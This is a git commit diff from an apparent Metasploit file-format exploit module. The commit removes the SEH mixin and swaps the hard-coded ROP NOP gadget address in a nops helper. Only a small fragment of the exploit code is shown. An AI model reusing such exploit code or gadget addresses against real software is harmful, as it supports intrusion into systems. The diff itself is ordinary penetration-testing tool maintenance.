remove seh mixin and fix the rop nop address

bug/bundler_fix
modpr0be 2013-07-06 23:08:51 +07:00
parent 23d2bfc915
commit ecb2667401
1 changed files with 1 additions and 2 deletions

View File

@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::FILEFORMAT include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -73,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def nops(rop=false, n=1) def nops(rop=false, n=1)
return rop ? [0x6ab21799] * n : [0x90909090] * n return rop ? [0x6ab16202] * n : [0x90909090] * n
end end
def exploit def exploit